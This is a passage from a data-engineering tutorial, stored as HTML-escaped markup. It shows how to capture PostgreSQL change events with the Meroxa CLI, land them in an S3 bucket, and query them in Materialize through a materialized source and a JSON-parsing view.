      &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;resource-217&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;ts_ms&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255875129&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;snapshot&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;false&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;db&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my_database&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;public&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;table&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;txId&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;8355&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;lsn&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;478419097256&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;op&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;u&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;ts_ms&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255875392&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This record captured from PostgreSQL has two parts: a &lt;code class=&quot;language-text&quot;&gt;payload&lt;/code&gt; and a &lt;code class=&quot;language-text&quot;&gt;schema&lt;/code&gt;. The &lt;code class=&quot;language-text&quot;&gt;payload&lt;/code&gt; represents the data captured from the source. In this case, the record contains the operation (&lt;code class=&quot;language-text&quot;&gt;op&lt;/code&gt;) performed and the data before and after that operation. Meroxa will also automatically record the &lt;code class=&quot;language-text&quot;&gt;schema&lt;/code&gt; of the payload within the record and capture its changes over time.&lt;/p&gt;
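Since each record is plain JSON, its fields are easy to pull out with any JSON tool. A minimal sketch (the trimmed `record.json` contents below are hypothetical, and `python3` is assumed to be available):

```shell
# A trimmed, hypothetical CDC record saved locally for illustration.
cat > record.json <<'EOF'
{"payload": {"op": "u", "after": {"id": 1, "email": "a@example.com"}}}
EOF

# Extract the operation type from the payload.
python3 -c "import json; r = json.load(open('record.json')); print(r['payload']['op'])"
```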
&lt;h3&gt;Prerequisites&lt;/h3&gt;
&lt;p&gt;Before you begin building, you’ll need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;PostgreSQL Database (e.g., &lt;a href=&quot;https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_Tutorials.WebServerDB.CreateDBInstance.html&quot;&gt;Amazon RDS&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.aws.amazon.com/AmazonS3/latest/userguide/create-bucket-overview.html&quot;&gt;AWS S3 Bucket&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/docs/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://materialize.com/docs/get-started/&quot;&gt;Materialize CLI&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Step 1: Adding Resources to Meroxa&lt;/h3&gt;
&lt;p&gt;To begin, you’ll need a &lt;a href=&quot;http://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; account and the &lt;a href=&quot;https://docs.meroxa.com/docs/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;. Then, you can add resources to your Meroxa Resource Catalog. We can do so with the following commands:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Add PostgreSQL resource:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; resource postgresDB &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;-u&lt;/span&gt; postgres://&lt;span class=&quot;token variable&quot;&gt;$PG_USER&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PASS&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$PG_URL&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PORT&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$PG_DB&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;--metadata&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;2. Add Amazon S3 resource:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; resource datalake &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; s3 &lt;span class=&quot;token parameter variable&quot;&gt;-u&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;s3://&lt;span class=&quot;token variable&quot;&gt;$AWS_ACCESS_KEY&lt;/span&gt;:&lt;span class=&quot;token variable&quot;&gt;$AWS_ACCESS_SECRET&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$AWS_REGION&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$AWS_S3_BUCKET&lt;/span&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*4yAizncM0QltUIC5RQqeGQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
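Both `meroxa add resource` commands above assume the connection details are already exported as environment variables. A minimal sketch with placeholder values (all values below are hypothetical; substitute your own credentials):

```shell
# Hypothetical placeholder values -- replace with your actual credentials.
export PG_USER=postgres
export PG_PASS=secret
export PG_URL=mydb.abc123.us-east-2.rds.amazonaws.com
export PG_PORT=5432
export PG_DB=my_database

# The CLI receives the fully assembled connection URL:
echo "postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB"
```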
&lt;p&gt;For more details about Meroxa Platform access, permissions, or environment-specific instructions, please see:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;PostgreSQL Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;Amazon S3 Documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Step 2: Building the pipeline&lt;/h3&gt;
&lt;p&gt;Now that you have resources within your Meroxa Resource Catalog, you can connect them with the &lt;code class=&quot;language-text&quot;&gt;meroxa connect&lt;/code&gt; command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa connect &lt;span class=&quot;token parameter variable&quot;&gt;--from&lt;/span&gt; postgresDB &lt;span class=&quot;token parameter variable&quot;&gt;--input&lt;/span&gt; public.User &lt;span class=&quot;token parameter variable&quot;&gt;--to&lt;/span&gt; datalake&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*2etkdADYntI7awceuRi6_g.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;meroxa connect&lt;/code&gt; command will create two connectors for you. Alternatively, you can use the &lt;code class=&quot;language-text&quot;&gt;meroxa create connector&lt;/code&gt; command to create each one separately.&lt;/p&gt;
&lt;p&gt;You can view the created connectors with the &lt;code class=&quot;language-text&quot;&gt;meroxa list connectors&lt;/code&gt; command:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*VXQvclDU0G8OPJxIVcdOiQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;After connecting the resources together, Meroxa will:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Analyze your resources and automatically configure the proper connectors.&lt;/li&gt;
&lt;li&gt;Perform initial data sync between source and destination.&lt;/li&gt;
&lt;li&gt;Track every insert, update, and delete in Postgres and send it to S3 in real time.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If the pipeline was created successfully, you will see captured events in the S3 bucket you configured:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*9Q47J94NV9F9oHnoaQfZjA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;We can now add S3 as a source in Materialize.&lt;/p&gt;
&lt;h3&gt;Step 3: Add S3 as a Materialized Source&lt;/h3&gt;
&lt;p&gt;Rather than loading data into tables, you connect Materialize to external data sources and then create materialized views over the data that Materialize sees from those sources.&lt;/p&gt;
&lt;p&gt;In this case, we can &lt;a href=&quot;https://materialize.com/docs/sql/create-source/json-s3/&quot;&gt;add our Amazon S3 bucket as a source&lt;/a&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;First, start Materialize:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;materialized &lt;span class=&quot;token parameter variable&quot;&gt;-w&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Next, in another terminal, open &lt;code class=&quot;language-text&quot;&gt;psql&lt;/code&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;psql &lt;span class=&quot;token parameter variable&quot;&gt;-U&lt;/span&gt; materialize &lt;span class=&quot;token parameter variable&quot;&gt;-h&lt;/span&gt; localhost &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;6875&lt;/span&gt; materialize&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Create the materialized source:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; MATERIALIZED SOURCE user_cdc_stream
&lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; S3 DISCOVER OBJECTS &lt;span class=&quot;token keyword&quot;&gt;USING&lt;/span&gt; BUCKET SCAN &lt;span class=&quot;token string&quot;&gt;&apos;bucket-name&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; SQS NOTIFICATIONS &lt;span class=&quot;token string&quot;&gt;&apos;bucket-notifications&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; COMPRESSION GZIP
&lt;span class=&quot;token keyword&quot;&gt;WITH&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;region &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;us-east-2&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
FORMAT &lt;span class=&quot;token keyword&quot;&gt;TEXT&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This command creates a source from a bucket in S3 called &lt;code class=&quot;language-text&quot;&gt;bucket-name&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To listen for changes in S3, Materialize listens to Amazon SQS. In the command above, we also configure an SQS queue called &lt;code class=&quot;language-text&quot;&gt;bucket-notifications&lt;/code&gt;. To create a queue, see &lt;a href=&quot;https://docs.aws.amazon.com/AmazonS3/latest/userguide/ways-to-add-notification-config-to-bucket.html&quot;&gt;Amazon&apos;s walkthrough on configuring a bucket for notifications (SNS topic or SQS queue)&lt;/a&gt;.&lt;/p&gt;
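Wiring up those bucket notifications amounts to pointing the bucket at the queue's ARN. A hedged sketch using the AWS CLI (the queue ARN, account ID, and bucket name below are placeholders, and the `aws` invocation is left commented out because it needs live AWS credentials):

```shell
# Hypothetical queue ARN and event filter -- substitute your own values.
cat > notification.json <<'EOF'
{
  "QueueConfigurations": [
    {
      "QueueArn": "arn:aws:sqs:us-east-2:123456789012:bucket-notifications",
      "Events": ["s3:ObjectCreated:*"]
    }
  ]
}
EOF

# Apply the configuration to the bucket (requires AWS credentials):
# aws s3api put-bucket-notification-configuration \
#   --bucket your-bucket-name \
#   --notification-configuration file://notification.json
```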
&lt;p&gt;Lastly, we can inform Materialize that our files in S3 are compressed with &lt;code class=&quot;language-text&quot;&gt;GZIP&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For more details on access/configuration, see &lt;a href=&quot;https://materialize.com/docs/sql/create-source/json-s3/&quot;&gt;Materialized S3 + JSON documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now that we have a materialized source, we can query it like a table using SQL. For example, you can view the columns of the new table like so:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SHOW&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;COLUMNS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; user_cdc_stream&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*0wxLjOekG42jXR8Z2ffvVA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;text&lt;/code&gt; column contains a single CDC record in the format we mentioned in Step 1.&lt;/p&gt;
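To eyeball a few raw records before parsing them, you can select that column directly, for example (a quick sanity check; this assumes your Materialize version supports `LIMIT` in ad-hoc `SELECT`s):

```sql
-- Inspect a handful of raw CDC records from the S3 source.
SELECT text FROM user_cdc_stream LIMIT 5;
```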
&lt;h3&gt;Step 4: Create a Materialized View&lt;/h3&gt;
&lt;p&gt;Materialized views are built to handle streams of data and let you run super fast queries over that data. Using the following command, we can create a view that parses each JSON record and represents the information in columns:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; MATERIALIZED &lt;span class=&quot;token keyword&quot;&gt;VIEW&lt;/span&gt; user_cdc_table &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;id&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_id&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;email&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_email&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;name&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;birthday&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_birthday&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;createdAt&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;bigint&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_createdAt&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;updatedAt&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;bigint&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_updatedAt&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;id&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_id&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;email&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_email&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;name&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;birthday&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_birthday&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
